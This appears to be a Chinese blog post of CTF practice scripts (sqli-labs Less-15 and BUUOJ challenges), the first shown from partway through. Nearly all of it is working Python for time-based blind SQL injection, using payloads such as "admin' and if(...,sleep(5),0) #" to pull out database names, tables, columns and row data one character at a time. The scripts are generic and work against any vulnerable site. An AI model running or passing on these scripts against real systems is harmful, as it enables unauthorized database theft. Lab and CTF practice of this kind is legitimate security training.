#获取数据库表函数
def GetDBTables(url, dbname):
global DBTables
#存放数据库表数量的变量
DBTableCount = 0
print("[-]开始获取{0}数据库表数量:".format(dbname))
#开始遍历获取数据库表的数量
for DBTableCount in range(1, 99):
timeStart = time.time()
payload = "admin' and if((select count(table_name) from information_schema.tables where table_schema='"+dbname+"' )="+str(DBTableCount)+",sleep(5),0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))
break
print("[-]开始获取{0}数据库的表".format(dbname))
# 遍历表名时临时存放表名长度变量
tableLen = 0
# a表示当前正在获取表的索引
for a in range(0,DBTableCount):
print("[-]正在获取第{0}个表名".format(a+1))
# 先获取当前表名的长度
for tableLen in range(1, 99):
payload = "admin' and if((select length(table_name) from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1)="+str(tableLen)+",sleep(5),0) #"
timeStart = time.time()
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
break
# 开始获取表名
# 临时存放当前表名的变量
table = ""
# b表示当前表名猜解的位置
for b in range(1, tableLen+1):
# c表示33~127位ASCII中可显示字符
for c in range(33, 128):
timeStart = time.time()
payload = "admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0)#"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
table += chr(c)
print(table)
break
#把获取到的名加入到DBTables
DBTables.append(table)
#清空table,用来继续获取下一个表名
table = ""
# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):
global DBColumns
# 存放字段数量的变量
DBColumnCount = 0
print("[-]开始获取{0}数据表的字段数:".format(dbtable))
for DBColumnCount in range(99):
payload = "admin' and if((select count(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"')="+str(DBColumnCount)+",sleep(5),0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
timeStart = time.time()
res = conn.post(url,data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))
break
# 开始获取字段的名称
# 保存字段名的临时变量
column = ""
# a表示当前获取字段的索引
for a in range(0, DBColumnCount):
print("[-]正在获取第{0}个字段名".format(a+1))
# 先获取字段的长度
for columnLen in range(99):
payload = "admin' and if((select length(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1)="+str(columnLen)+",sleep(5),0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
timeStart = time.time()
res = conn.post(url,data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
break
# b表示当前字段名猜解的位置
for b in range(1, columnLen+1):
# c表示33~127位ASCII中可显示字符
for c in range(33, 128):
timeStart = time.time()
payload = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
res = conn.post(url,data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
column += chr(c)
print(column)
break
# 把获取到的名加入到DBColumns
DBColumns.append(column)
#清空column,用来继续获取下一个字段名
column = ""
# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
global DBData
# 先获取字段数据数量
DBDataCount = 0
print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
for DBDataCount in range(99):
payload = "admin' and if((select count("+dbcolumn+") from "+dbtable+")="+str(DBDataCount)+",sleep(5),0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
timeStart = time.time()
res = conn.post(url,data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
break
for a in range(0, DBDataCount):
print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))
#先获取这个数据的长度
dataLen = 0
for dataLen in range(99):
payload = "admin'and if((select length("+dbcolumn+") from "+dbtable+" limit "+str(a)+",1)="+str(dataLen)+",sleep(5),0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
timeStart = time.time()
res = conn.post(url,data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))
break
#临时存放数据内容变量
data1 = ""
#开始获取数据的具体内容
#b表示当前数据内容猜解的位置
for b in range(1, dataLen+1):
for c in range(33, 128):
payload = "admin' and if(ascii(substr((select "+dbcolumn+" from "+dbtable+" limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0) #"
data = {
'uname':payload,
'passwd':'admin',
'submit':'Submit',
}
timeStart = time.time()
res = conn.get(url,data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
data1 += chr(c)
print(data1)
break
#放到以字段名为键,值为列表的字典中存放
DBData.setdefault(dbcolumn,[]).append(data1)
print(DBData)
#把data清空来,继续获取下一个数据
data1 = ""
# 盲注主函数
def StartSqli(url):
GetDBName(url)
print("[+]当前数据库名:{0}".format(DBName))
GetDBTables(url,DBName)
print("[+]数据库{0}的表如下:".format(DBName))
for item in range(len(DBTables)):
print("(" + str(item + 1) + ")" + DBTables[item])
tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
GetDBColumns(url,DBName,DBTables[tableIndex])
while True:
print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
for item in range(len(DBColumns)):
print("(" + str(item + 1) + ")" + DBColumns[item])
columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
if(columnIndex == -1):
break
else:
GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])
if __name__ == '__main__':
try:
usage = "./BlindTime_get.py -u url"
parser = OptionParser(usage)
# 目标URL参数-u
parser.add_option('-u', '--url', dest='url',default='http://localhost/Less-15/', type='string',help='target URL')
options, args = parser.parse_args()
url = options.url
threadSQL = threading.Thread(target=StartSqli,args=(url,))
threadSQL.start()
except KeyboardInterrupt:
print("Interrupted by keyboard inputting!!!")
修改的地方:
payload
data
添加了time.sleep(0.05)
default
修改时要注意间隔
BlindTime_post-修改过的
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import requests
from optparse import OptionParser
import time
import threading
# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}
# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
# 获取数据库名函数
def GetDBName(url):
# 引用全局变量DBName,用来存放网页当前使用的数据库名
global DBName
print("[-]开始获取数据库名长度")
# 保存数据库名长度变量
DBNameLen = 0
# 用for循环来遍历请求,得到数据库名长度
for DBNameLen in range(1, 99):
# 开始时间
timeStart = time.time()
payload = "if(length(database())=" + str(DBNameLen) + ",sleep(5),0)"
# "admin' and if(length(database())=8,sleep(5),0) #"
data = {
'id': payload,
}
res = conn.post(url, data=data)
# 结束时间
timeEnd = time.time()
# 判断时间差
if timeEnd - timeStart >= 5:
print("[+]数据库名长度:" + str(DBNameLen))
break
print("[-]开始获取数据库名")
# a表示substr()函数的截取起始位置
for a in range(1, DBNameLen + 1):
# b表示33~127位ASCII中可显示字符
for b in range(33, 128):
time.sleep(0.05)
timeStart = time.time()
payload = "if(ascii(substr(database()," + str(a) + ",1))=" + str(b) + ",sleep(5),0)"
data = {
'id': payload,
}
res = conn.post(url, data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
DBName += chr(b)
print("[-]" + DBName)
break
# 获取数据库表函数
def GetDBTables(url, dbname):
global DBTables
# 存放数据库表数量的变量
DBTableCount = 0
print("[-]开始获取{0}数据库表数量:".format(dbname))
# 开始遍历获取数据库表的数量
for DBTableCount in range(1, 99):
time.sleep(0.05)
timeStart = time.time()
payload = "if((select count(table_name) from information_schema.tables where table_schema='" + dbname + "' )=" + str(DBTableCount) + ",sleep(5),0)"
data = {
'id': payload,
}
res = conn.post(url, data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))
break
print("[-]开始获取{0}数据库的表".format(dbname))
# 遍历表名时临时存放表名长度变量
tableLen = 0
# a表示当前正在获取表的索引
for a in range(0, DBTableCount):
print("[-]正在获取第{0}个表名".format(a + 1))
# 先获取当前表名的长度
for tableLen in range(1, 99):
time.sleep(0.05)
payload = "if((select length(table_name) from information_schema.tables where table_schema='" + dbname + "' limit " + str(a) + ",1)=" + str(tableLen) + ",sleep(5),0)"
timeStart = time.time()
data = {
'id': payload,
}
res = conn.post(url, data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
break
# 开始获取表名
# 临时存放当前表名的变量
table = ""
# b表示当前表名猜解的位置
for b in range(1, tableLen + 1):
# c表示33~127位ASCII中可显示字符
for c in range(33, 128):
time.sleep(0.05)
timeStart = time.time()
payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='" + dbname + "' limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"
data = {
'id': payload,
}
res = conn.post(url, data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
table += chr(c)
print(table)
break
# 把获取到的名加入到DBTables
DBTables.append(table)
# 清空table,用来继续获取下一个表名
table = ""
# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):
global DBColumns
# 存放字段数量的变量
DBColumnCount = 0
print("[-]开始获取{0}数据表的字段数:".format(dbtable))
for DBColumnCount in range(99):
time.sleep(0.05)
payload = "if((select count(column_name) from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "')=" + str(DBColumnCount) + ",sleep(5),0)"
data = {
'id': payload,
}
timeStart = time.time()
res = conn.post(url, data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))
break
# 开始获取字段的名称
# 保存字段名的临时变量
column = ""
# a表示当前获取字段的索引
for a in range(0, DBColumnCount):
print("[-]正在获取第{0}个字段名".format(a + 1))
# 先获取字段的长度
for columnLen in range(99):
time.sleep(0.05)
payload = "if((select length(column_name) from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "' limit " + str(a) + ",1)=" + str(columnLen) + ",sleep(5),0)"
data = {
'id': payload,
}
timeStart = time.time()
res = conn.post(url, data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
break
# b表示当前字段名猜解的位置
for b in range(1, columnLen + 1):
# c表示33~127位ASCII中可显示字符
for c in range(33, 128):
time.sleep(0.05)
timeStart = time.time()
payload = "if(ascii(substr((select column_name from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "' limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"
data = {
'id': payload,
}
res = conn.post(url, data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
column += chr(c)
print(column)
break
# 把获取到的名加入到DBColumns
DBColumns.append(column)
# 清空column,用来继续获取下一个字段名
column = ""
# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
global DBData
# 先获取字段数据数量
DBDataCount = 0
print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
for DBDataCount in range(99):
time.sleep(0.05)
payload = "if((select count(" + dbcolumn + ") from " + dbtable + ")=" + str(DBDataCount) + ",sleep(5),0)"
data = {
'id': payload,
}
timeStart = time.time()
res = conn.post(url, data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
break
for a in range(0, DBDataCount):
print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a + 1))
# 先获取这个数据的长度
dataLen = 0
for dataLen in range(99):
time.sleep(0.05)
payload = "if((select length(" + dbcolumn + ") from " + dbtable + " limit " + str(a) + ",1)=" + str(dataLen) + ",sleep(5),0)"
data = {
'id': payload,
}
timeStart = time.time()
res = conn.post(url, data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
print("[-]第{0}个数据长度为:{1}".format(a + 1, dataLen))
break
# 临时存放数据内容变量
data1 = ""
# 开始获取数据的具体内容
# b表示当前数据内容猜解的位置
for b in range(1, dataLen + 1):
for c in range(33, 128):
time.sleep(0.05)
payload = "if(ascii(substr((select " + dbcolumn + " from " + dbtable + " limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"
data = {
'id': payload,
}
timeStart = time.time()
res = conn.get(url, data=data)
timeEnd = time.time()
if timeEnd - timeStart >= 5:
data1 += chr(c)
print(data1)
break
# 放到以字段名为键,值为列表的字典中存放
DBData.setdefault(dbcolumn, []).append(data1)
print(DBData)
# 把data清空来,继续获取下一个数据
data1 = ""
# 盲注主函数
def StartSqli(url):
GetDBName(url)
print("[+]当前数据库名:{0}".format(DBName))
GetDBTables(url, DBName)
print("[+]数据库{0}的表如下:".format(DBName))
for item in range(len(DBTables)):
print("(" + str(item + 1) + ")" + DBTables[item])
tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
GetDBColumns(url, DBName, DBTables[tableIndex])
while True:
print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
for item in range(len(DBColumns)):
time.sleep(0.05)
print("(" + str(item + 1) + ")" + DBColumns[item])
columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
if (columnIndex == -1):
break
else:
GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])
if __name__ == '__main__':
try:
usage = "./BlindTime_get.py -u url"
parser = OptionParser(usage)
# 目标URL参数-u
parser.add_option('-u', '--url', dest='url',
default='http://1e21f92c-e6dd-42ac-95f0-ed1281e49749.node4.buuoj.cn:81/', type='string',
help='target URL')
options, args = parser.parse_args()
url = options.url
threadSQL = threading.Thread(target=StartSqli, args=(url,))
threadSQL.start()
except KeyboardInterrupt:
print("Interrupted by keyboard inputting!!!")
时间盲注-POST-1(知表知字段求flag)
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import requests
from optparse import OptionParser
import time
import threading
# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}
# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
def woqv(url):
a=""
print("[-]开始获取数据库名长度")
# 用for循环来遍历请求,得到数据库名长度
for ll in range(1, 50):
for kk in range(33,127):
time.sleep(0.05)
# 开始时间
timeStart = time.time()
payload = "if((ascii(substr((select(flag)from(flag))," + str(ll) + ",1))=" + str(kk) + "),sleep(5),0)"
# "admin' and if(length(database())=8,sleep(5),0) #"
data = {
'id':payload,
}
res = conn.post(url,data=data)
# 结束时间
timeEnd = time.time()
# 判断时间差
if timeEnd - timeStart >= 5:
a+=chr(kk)
print(a)
break
# 盲注主函数
def StartSqli(url):
woqv(url)
if __name__ == '__main__':
try:
usage = "./BlindTime_get.py -u url"
parser = OptionParser(usage)
# 目标URL参数-u
parser.add_option('-u', '--url', dest='url',default='http://4fbbc7a5-c5b9-4628-b997-a2c82c97252d.node4.buuoj.cn:81/', type='string',help='target URL')
options, args = parser.parse_args()
url = options.url
threadSQL = threading.Thread(target=StartSqli,args=(url,))
threadSQL.start()
except KeyboardInterrupt:
print("Interrupted by keyboard inputting!!!")
752
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
